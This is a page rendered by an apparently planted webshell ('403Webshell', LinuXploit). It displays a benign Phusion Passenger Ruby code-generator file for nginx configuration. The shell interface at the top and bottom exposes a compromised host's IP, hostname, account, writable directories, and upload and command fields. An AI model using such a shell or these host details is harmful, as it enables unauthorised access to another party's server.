403Webshell
Server IP : 66.29.132.122  /  Your IP : 3.128.255.168
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/root/opt/cpanel/ea-ruby27/src/passenger-release-6.0.23/src/nginx_module/MainConfig/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/opt/cpanel/ea-ruby27/src/passenger-release-6.0.23/src/nginx_module/MainConfig/AutoGeneratedCreateFunction.c.cxxcodebuilder
#  Phusion Passenger - https://www.phusionpassenger.com/
#  Copyright (c) 2010-2017 Phusion Holding B.V.
#
#  "Passenger", "Phusion Passenger" and "Union Station" are registered
#  trademarks of Phusion Holding B.V.
#
#  Permission is hereby granted, free of charge, to any person obtaining a copy
#  of this software and associated documentation files (the "Software"), to deal
#  in the Software without restriction, including without limitation the rights
#  to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#  copies of the Software, and to permit persons to whom the Software is
#  furnished to do so, subject to the following conditions:
#
#  The above copyright notice and this permission notice shall be included in
#  all copies or substantial portions of the Software.
#
#  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#  IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#  FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#  AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#  LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#  OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#  THE SOFTWARE.

# This file uses the cxxcodebuilder API. Learn more at:
# https://github.com/phusion/cxxcodebuilder

require 'phusion_passenger/nginx/config_options'

def main
  set_indent_string '    '
  comment copyright_header_for(__FILE__), 1

  separator

  comment %q{
    MainConfig/AutoGeneratedCreateFunction.c is automatically generated from
    MainConfig/AutoGeneratedCreateFunction.c.cxxcodebuilder,
    using definitions from src/ruby_supportlib/phusion_passenger/nginx/config_options.rb.
    Edits to MainConfig/AutoGeneratedCreateFunction.c will be lost.

    To update MainConfig/AutoGeneratedCreateFunction.c:
      rake nginx

    To force regeneration of MainConfig/AutoGeneratedCreateFunction.c:
      rm -f src/nginx_module/MainConfig/AutoGeneratedCreateFunction.c
      rake src/nginx_module/MainConfig/AutoGeneratedCreateFunction.c
  }

  separator

  function('void passenger_create_autogenerated_main_conf(passenger_autogenerated_main_conf_t *conf)') do
    filter_options_eligible_for_value_definitions(NGINX_CONFIGURATION_OPTIONS).each do |option|
      if option[:type] == :string
        add_code %Q{
          conf->#{value_struct_field_for(option)}.data = NULL;
          conf->#{value_struct_field_for(option)}.len  = 0;
        }
      elsif option[:type] == :integer || option[:type] == :flag
        add_code %Q{
          conf->#{value_struct_field_for(option)} = NGX_CONF_UNSET;
        }
      elsif option[:type] == :uinteger
        add_code %Q{
          conf->#{value_struct_field_for(option)} = NGX_CONF_UNSET_UINT;
        }
      elsif option[:type] == :string_array
        add_code %Q{
          conf->#{value_struct_field_for(option)} = NGX_CONF_UNSET_PTR;
        }
      elsif option[:type] == :string_keyval
        add_code %Q{
          conf->#{value_struct_field_for(option)} = NULL;
        }
      else
        raise "Unknown option type #{option[:type].inspect} for option #{option[:name]}"
      end
    end

    separator

    filter_options_eligible_for_source_location_definitions(NGINX_CONFIGURATION_OPTIONS).each do |option|
      field = source_location_struct_field_for(option)
      add_code %Q{
        conf->#{field}_source_file.data = NULL;
        conf->#{field}_source_file.len = 0;
        conf->#{field}_source_line = 0;
        conf->#{field}_explicitly_set = 0;
      }
    end
  end
end

def filter_options_eligible_for_value_definitions(options)
  options.reject do |option|
    option[:alias_for] ||
      option.fetch(:field, true).nil? ||
      option[:field].to_s =~ /\./ ||
      option[:struct] != 'NGX_HTTP_MAIN_CONF_OFFSET' ||
      option[:auto_generate_nginx_create_code] == false
  end
end

def filter_options_eligible_for_source_location_definitions(options)
  options.reject do |option|
    option[:alias_for] ||
      option.fetch(:field, true).nil? ||
      option[:struct] != 'NGX_HTTP_MAIN_CONF_OFFSET'
  end
end

def value_struct_field_for(option)
  if option.has_key?(:field)
    option[:field].to_s
  else
    option[:name].sub(/^passenger_/, '')
  end
end

def source_location_struct_field_for(option)
  result = value_struct_field_for(option)
  result.gsub('.', '_')
end

main

Youez - 2016 - github.com/yon3zu
LinuXploit